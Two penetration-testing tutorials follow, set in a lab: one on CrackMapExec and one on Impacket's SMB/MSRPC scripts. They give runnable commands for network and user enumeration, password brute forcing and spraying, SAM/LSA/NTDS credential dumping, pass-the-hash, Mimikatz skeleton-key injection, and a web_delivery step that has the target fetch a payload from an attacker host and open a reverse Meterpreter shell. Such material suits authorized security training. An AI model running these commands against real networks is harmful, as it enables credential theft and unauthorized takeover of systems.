Lateral Moment on Active Directory: CrackMapExec

In this article, we learn to use crackmapexec. This tool is developed by byt3bl33d3r. I have used this tool many times for both offensive and defensive techniques. And with my experience from this tool, I can say that the tool is so amazing that one can use it for situational awareness as well as lateral movement. You can download the tool from here.

Table of Content

·         Introduction to Crackmapexec

·         Crackmapexec and Red Team

·         Configurations Used for Practical

·         Installation

·         Enumeration

o   Discovering IPs

o   users

o   groups

o   txt files

o   log files

o   share

o   sessions

o   password policies

o   Drives

·         Bruteforce

·         Dictionary Attack

·         Credential Dumping

o   SAM

o   LSA

o   NTDS

·         Pass the Hash

·         Password spraying

·         Remote Command Execution

o   wmiexec

o    atexec

·         Modules

o   mimikatz

o   wdigest

o   enum_dns

o   Web delivery

Introduction to Crackmapexec

Crackmapexec, also known as CME, is a post-exploitation tool. The developer of the tool describes it as a "swiss army knife for pen-testing networks", which I find is an apt description. The tool is developed in python and lets us move laterally in an environment while being situationally aware. It abuses the Active Directory security by gathering all the information from IP addresses to harvesting the credentials from SAM. And this is the only information we need for our lateral movement. It also offers us numerous modules such as mimikatz, web delivery, wdigest, etc. to make dumping of credentials and getting a session easy. Hence, making an attacker all-powerful by letting them living off the Land.

Configurations Used for Practical

·         Target: Windows Server 2016

·         Attacker: Kali Linux 2020.1

Here, in our lab scenario, we have configured the following settings on our systems.

Windows Server Details

·         Domain: ignite.local

·         User: Administrator

·         Password: Ignite@987

·         IP Address: 192.168.1.105

Windows Client Details

·         OS: Windows 10

·         IP Address: 192.168.1.106

·         Users: kavish, geet, aarti, yashika

·         Password: Password@1

Installation

The installation for this tool is most simple as for installation just use the following command:

apt install crackmapexec

Note: if the above command gives any issue then we recommend you to perform an apt update and upgrade on your Kali.

Enumeration: Discovering IPs

To discover the IPs on the target network, use the following command:

crackmapexec smb 192.168.1.0/24

And as shown in the image above, you will have the list of the IPs.

In a general sense, the syntax for crackmapexec is:

crackmapexec -u ‘‘ -p ‘‘

Which will bring out the command to be:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’

Enumeration: Users

To find out all the lists of the users in your target system, we will use the ‘—user’ parameter. Hence, the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --users

As shown in the above image, the execution of the above command will show the users of the target system.

Enumeration: Groups

To get the details of the groups from the target system, use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --groups

Enumeration: Text files

To get all the information of the text files in the target system, such as path, use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --spider C\$ --pattern txt

Enumeration: Log Files

Similarly, to retrieve the information of log files from the target system, use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --spider C\$ --pattern log

This way you can access the information on any file extension such as exe, etc.

Enumeration: Shares

To know what folders are shared among the network and what permissions they have, we can use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --shares

As shown in the image above, we will have all the information for share folders in the network.

Enumeration: Sessions

The active sessions details can be found from the command given below:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --sessions

Enumeration: Password Policies

To know the password policies that have been applied in the target system, CME provides us with the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --pass-pol

Executing the above command will give us the details of the password policies as shown in the image above.

Enumeration: Drives

To find out how many drives are there in the target system, with what name; we can use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --disks

Bruteforce: Username

With crackmapexec, you can also brute force the username that will match our correct password. We will be doing this on the whole network, that is why we will specify the IP range instead of just giving IP. We will do this, with the following command:

crackmapexec smb 192.168.1.0/24 -u “kavish” “Administrator” -p “Ignite@987”

Bruteforce: Password

With CME, we can brute-force passwords on a single target system or the whole network. In our practice, we have a brute-forced password on the whole network. To do the said, type:

crackmapexec smb 192.168.1.0/24 -u "Administrator" -p "password1" "password2" "Ignite@987"

Dictionary Attack

CME also enable us to do dictionary on both username and password. Both custom or already made dictionaries can be given for the attack. In our practical, we have given a custom-made dictionary for both usernames and passwords. This attack can be done on the whole network or a single IP. We are doing this attack on the whole network as we are giving a whole IP range. To initiate the attack, use the following command:

crackmapexec smb 192.168.1.0/24 -u /root/Desktop/user.txt -p /root/Desktop/pass.txt

Credential Dumping: SAM

SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. Using CME, we will dump the credentials from SAM in the form of hashes by using the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --sam

Credential Dumping: LSA

The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. Domain credentials are used by the operating system and authenticated by the Local Security Authority (LSA). Therefore, LSA has access to the credentials and we will exploit this fact to harvest the credentials with CME by using the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --lsa

Credential Dumping: NTDS (DRSUAPI)

NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree. This file acts as a database for Active Directory and stores all its data including all the credentials. And so we will manipulate this file to dump the hashes by using the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --ntds drsuapi

Another way to retrieve credentials from NTDS is through VSS i.e. the volume shadow copy. And for this method, use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --ntds vss

Pass the Hash

Once we have dumped hashes, we don’t need to use any other tool to pass the hash. With CME we need to use the following command:

crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38

Password Spraying

Password Spraying is an attack where we get hold of accounts by using the same passwords for the same numerous usernames until we find a correct one. With CME, we can perform password spraying with two methods.  In the first method, we will use the parameter ‘--rid-brute’. To use this parameter, the syntax will be:

crackmapexec -u -p ‘‘ --rid-brute

Going by the above syntax, the command is:

crackmapexec smb 192.168.1.106 -u /root/Desktop/user.txt -p ‘Password@1’ --rid-brute

Another method for password spraying is by using the ‘--continue-on-success’ and we will use this parameter with our custom-made dictionary that has all the usernames. The contents of the dictionary are shown in the image below using the cat command. And then for password spraying, use the following command:

crackmapexec smb 192.168.1.106 -u /root/Desktop/user.txt -p ‘Password@1’ --continue-on-success

Remote Command Execution

Now that we have studied various ways to obtain the password, let now make use of it as CME allows us to remotely execute commands. We can use the quser command to get information about the users. And logoff command to log off the target system. The syntax for executing commands remotely is:

crackmapexec -u ‘‘ -p ‘‘ -x ‘‘

following the above syntax, our commands will be:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -x ‘quser’

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -x ‘logoff 2’

And as you can see in the image above, our commands are successfully executed and we have the information.

Remote Command Execution: atexec

This command will execute the command with the help of the Task Scheduler service. For this, use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -x ‘net user Administrator /domain’ --exec-method atexec

And as you can see in the image above, our commands are successfully executed and we have the information.

Remote Command Execution: wmiexec

This command will execute the command with the help of the Windows Management Instrumentation (WMI) service. For this, use the following command:

And as you can see in the image above, our commands are successfully executed and we have the information.

We can also make the use of the PowerShell Cmdlets to execute tasks over the Remote using CME. This is possible due to the ability to execute commands remotely via WMI. For this use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -X ‘$PSVersionTable’ --exec-method wmiexec

And as you can see in the image above, our PowerShell Cmdlet is executed successfully and we have the information.

Talking about WMI, we can also directly run the WMI command on the target using CME. The parameter ‘--wmi’ is designed for this purpose. We can provide it with the command string of WMI and it will execute it as shown in the image given below.

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ --wmi “select Name from Win32_UserAccount”

And as we can see that we have a list of users on the target system which we extracted with the help of wmi command strings.

Modules

If from the above options you are not tempted to add CME in your tool kit, I bet the following will have you convinced in no time. CME also provides us with various modules which call upon the third-party tools like Mimikatz, Metasploit Framework, etc. to get the work done. To view all the modules that CME has to offer, use the following command:

crackmapexec smb -L

Just as shown in the image above, all the modules will be displayed after running the above command successfully. Now let’s take a few of the modules from this and see how we can use them.

Modules: mimikatz

First, we will run Mimikatz directly as a module without giving it any other argument. The syntax for this is as following:

crackmapexec -u -p ‘ -M

Which will further make our command out to be as follows:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M mimikatz

So now, as you can see in the image above, running the mimikatz module without any other argument will give the system credentials in the form of hashes.

Now let’s try and give a mimikatz command as an argument, for doing so the command will be:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M mimikatz -o COMMAND=‘privilege::debug’

And so, the command will debug all the privileges as shown in the image above. Now let’s try to run another command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M mimikatz -o COMMAND=‘sekurlsa::logonPasswords’

Hence, running the above command will display all the hashes of the logon password. This way, you can also give further argument such as the argument to inject skeleton key with the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M mimikatz -o COMMAND=‘misc::skeleton’

And as you can see that the above command has been executed successfully.

Module: Wdigest

Another module that CME presents us is wdigest. This module will create a registry key due to which passwords are stored in memory. To use this module, type the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M wdigest -o ACTION=enable

And as you can see in the image above, the registry key is created.

Module: enum_dns

This module harvests all the information about the target DNS and displays it on the console. To use this module, use the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M enum_dns

And as you can see in the image above all the information is dumped on the console.

Module: web_delivery

To this module, first open Metasploit Framework using the command ‘msfconsole’ and then type the following set of commands to initiate web_delivery:

use exploit/multi/script/web_delivery

set target 2

set payload windows/meterpreter/reverse_tcp

set lhost

set srvhost

exploit

It will create a link as it is shown in the image above. Copy that link and remotely execute it in the target machine through CME using the following command:

crackmapexec smb 192.168.1.105 -u ‘Administrator’ -p ‘Ignite@987’ -M web_delivery -o URL=http://192.168.1.112:8080/rlNdPdZQMeYWLF

And once the above command is executed successfully, you will have the meterpreter session as shown in the following image:

Conclusion

Enumeration is an intense task in any Penetration Testing as well as Red Team Assessment. But we saw that with the help of Crackmapexec or CME it seems quite easier and faster. Lateral Movement can take a huge amount of time if not done properly in an environment. But CME provides us this functionality in just a single execution that any script kiddie can manipulate and perform. Overall this proves that CME is an important tool for Enumeration, Remote Command Execution, Lateral Movement and it should be in every pentester’s arsenal.

Impacket Guide: SMB/MSRPC

There have been many Red Team scenarios, Capture the Flag challenges where we face the Windows Server. After exploiting and getting the initial foothold in the server it is very difficult to extract the data and as well as there are scenarios where we couldn’t get onto the server per se. But using the SMB we can execute commands remotely on the server. This was visualized by the SecureAuth and they gave us one of the most amazing collection of Python classes for working on different protocols. This collection is named Impacket.

Official GitHub Repository:   SecureAuthCorp /impacket

Table of Contents

·         Introduction to SMB

·         Introduction to MSRPC

·         Configurations Used in Practical

·         Impacket Categories

·         Installation

·         smbclient.py

·         lookupsid.py

·         reg.py

·         rpcdump.py

·         samrdump.py

·         services.py

·         ifmap.py

·         opdump.py

·         getArch.py

·         netview.py

·         Conclusion

Introduction to SMB

The SMB is a network protocol which is also know as Server Message Block protocol. It is used to communicate between a client and a server. It can be used to share the files, printers and some other network resources. It was created by IBM in the 1980s.

Introduction to MSRPC

MSRPC or Microsoft Remote Procedure Call is a modified version of DCE/RPC. It was created by Microsoft to seamlessly create a client/server model in Windows. The Windows Server domain protocols are entirely based on MSRPC.

Configurations Used in Practical

o   Attacker Machine

o   OS: Kali Linux 2020.1

o   IP Address: 192.168.1.112

o   Target Machine

o   OS: Windows Server 2016

o   IP Address: 192.168.1.105

Impacket Categories

·         Remote Execution

·         Kerberos

·         Windows Secrets

·         Server Tools/MiTM Attacks

·         WMI

·         Known Vulnerabilities

·         SMB/MSRPC

o   smbclient.py

o   lookupsid.py

o   reg.py

o   rpcdump.py

o   samrdump.py

o   services.py

o   ifmap.py

o   opdump.py

o   getArch.py

o   netview.py

·         MSSQL / TDS

·         File Formats

·         Other

Installation

Before using the Impacket tool kit on our system, we need to install it. Installation process is quite simple. First, head to the GitHub Repository by clicking here. Then using the git clone command, we clone the complete repository to out Attacker Machine. After cloning we can see that there is a setup.py file, let us install it. After installation, we will head to the examples directory and use the scripts as per our convenience.

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket/

ls

python setup.py install

smbclient.py

There are moments where we needed to perform multiple actions between the attacker machine and the target machine. It can be listing shares and files, renaming some file, uploading the binaries or downloading files from the target machine. There are some situations where we even need to create a folder or two on the target machine. Performing such actions can get tricky while working with a shell that can be detected or can close at any time. The smbclient.py script helps us in these situations. It can connect to the Target Machine with the help of bunch of attributes.

Requirements:

o   Domain

o   Username

o   Password/Password Hash

o   Target IP Address

When we provide the following parameters to the smbclient in such a format as shown below and we will get connected to the target machine and we have a smb shell which can run a whole range of commands like dir, cd, pwd, put, rename, more, del, rm, mkdir, rmdir, info, etc

Syntax:

smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address]

Command:

smbclient.py ignite/Administrator:Ignite@987@192.168.1.105

lookupsid.py

A Security Identifier (SID) is a unique value of variable length that is used to identify a user account. Through a SID User Enumeration, we can extract the information about what users exist and their data. Lookupsid script can enumerate both local and domain users. There is a Metasploit module too for this attack. If you are planning on injecting a target server with a golden or a silver ticket then one of the things that are required is the SID of the 500 user. Lookupsid.py can be used in that scenario. When we provide the following parameters to the Lookupsid in such a format as shown below.

Requirements:

o   Domain

o   Username

o   Password/Password Hash

o   Target IP Address

Syntax:

lookupsid.py [domain]/[user]:[password/password hash]@[Target IP Address]

Command:

lookupsid.py ignite/Administrator:Ignite@987@192.168.1.105

reg.py

This Impacket script is ripped straight out of the reg.exe of the Windows OS. Reg.exe is an executable service that can read, modify and delete registry values when used with eh combination of query, add, delete keywords respectively. We can even begin to express the importance of the access of the registry. Registry controls each and every aspect of the system. It can be used to gain information about the various policies, software and also alter some of those policies.

Requirements:

o   Domain

o   Username

o   Password/Password Hash

o   Target IP Address

o   Registry Key Name

Syntax:

reg.py [domain]/[user]:[password:password hash]@[Target IP Address] [action] [action parameter]

Command:

reg.py ignite/Administrator:Ignite@987@192.168.1.105 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s

rpcdump.py

RPC or Remote Procedure Call is when a computer program causes a procedure to execute in different address space which is coded as a normal procedure call. This script can enumerate those endpoints for us. It also matches them to some of the well-known endpoints in order to identify them.

Requirements:

o   Domain

o   Username

o   Password/Password Hash

o   Target IP Address

Syntax:

rpcdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]

Command:

rpcdump.py ignite/Administrator:Ignite@987@192.168.1.105

samrdump.py

Samrdump is an application that retrieves sensitive information about the specified target machine using Security Account Manager (SAM). It is a remote interface that is accessible under the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) service. It lists out all the system shares, user accounts, and other useful information about the target’s presence in the local network. The image clearly shows us all the user accounts that are held by the remote machine. Inspecting all the available shares for sensitive data and accessing other user accounts can further reveal valuable information.

Requirements:

o   Domain

o   Username

o   Password/Password Hash

o   Target IP Address

Syntax:

samrdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]

Command:

samrdump.py ignite/Administrator:Ignite@987@192.168.1.105

services.py

The services script of the Impacket communicates with Windows services with the help of MSRPC Interface. It can start, stop, delete, read status, config, list, create and change any service. While working on Red Teaming assignments there were so many tasks that could have been simplified if only, we have the access to the services of the Target machine. This makes it all a simple task.

Requirements:

o   Domain

o   Username

o   Password/Password Hash

o   Target IP Address

o   Action

Syntax:

services.py [domain]/[user]:[Password/Password Hash]@[Target IP Address] [Action]

Command:

services.py ignite/Administrator:Ignite@987@192.168.1.105 list

ifmap.py

Ifmap scripts initially binds to the MGMT interface of the Target machine. Then it fetches a list of interface IDs. Then it adds those IDs to another large list of UUIDs it already has in its database. Then it tries to bind each of the interface and reports the status of the interface. The status can be listed or listening. Its ability to gather information is unmatched. There is a Metasploit Module that works quite similar to this script is “auxiliary/scanner/dcerpc/endpoint_mapper” The list of UUIDs (Universal Unique Identifier) which are running endpoint-mapper mapped to the unique services. After getting these services, an attacker can search on the internet to find if any of these services are vulnerable to Overflow over RPC.

Requirements:

o   Target IP Address

o   Target Port

o   Hostname (Optional)

Syntax:

ifmap.py [Target IP Address] [Target Port]

Command:

ifmap.py 192.168.1.105 135

opdump.py

This script binds to the given hostname:port and connects to the DCERPC (Distributed Computing Environment/ Remote Procedure Calls) interface. After connecting, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call. This generates a burst of TCP connections to the given host:port!

It gives the output as following:

op 0 (0x00): rpc_x_bad_stub_data

op 1 (0x01): rpc_x_bad_stub_data

op 2 (0x02): rpc_x_bad_stub_data

op 3 (0x03): success

op 4 (0x04): rpc_x_bad_stub_data

ops 5-255: nca_s_op_rng_error

rpc_x_bad_stub_data, rpc_s_access_denied, and success generally means there's an operation at that number.

Requirements:

o   IP Address

o   Hostname (Optional)

o   Port Interface Version

Syntax:

opdump.py [Target IP Address] [Port Interface Version]

Command:

opdump.py 192.168.1.105 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0

getArch.py

All PDUs (Protocol Data Unit) encoded with the NDR64 transfer syntax must use a value of 0x10 for the data representation format label. This value is used only in the transfers of the x64 bit systems. This scripts when provided with a target tried to communicate with the target system and collects the value of the data representation format label. Then it matches it to the NDR64 syntax stored in its code. Then it can provide the information to the attacker if the Operating System is a 64 bit or 32-bit system. We can also provide a list of targets and it can work simultaneously on all the targets.

Requirements:

o   Target IP Address

Syntax:

getArch.py -target [Target IP Address]

getArch.py -targets [Target List]

Command:

getArch.py -targets /root/Desktop/target.txt

netview.py

It is an enumeration tool. It requires the domain name to enumerate hosts. It can also be provided a list of hosts or targets. Once a list is gathered then netview checks each of the following:

o   IP addresses

o   Shares

o   Sessions

o   Logged On Users

Once finding the information it doesn’t stop. It keeps looping over the hosts found and keep a detailed track of who logged in/out from remote servers. It keeps the connections with the target systems and it is very stealthy as it just sends few DCERPC packets. This script requires that the attacker machine is able to resolve the domain machine’s NetBIOS names. This can be achieved by setting the DNS on the attacker machine to the domain DNS.

Requirements:

o   Domain

o   Target IP Address

o   Username

Syntax:

netview.py [domain]/[User] -target [Target IP Address] -users [User List]

netview.py [domain]/[User] -targets [Target List] -users [User List]

Command:

netview.py ignite/Administrator -targets /root/Desktop/target.txt -users /root/Desktop/user.txt

Conclusion

In this article we discussed the scripts in the Impacket Toolkit that can interact with the SMB/MSRPC services on a target system. Impacket has many categories which will further explore in due time.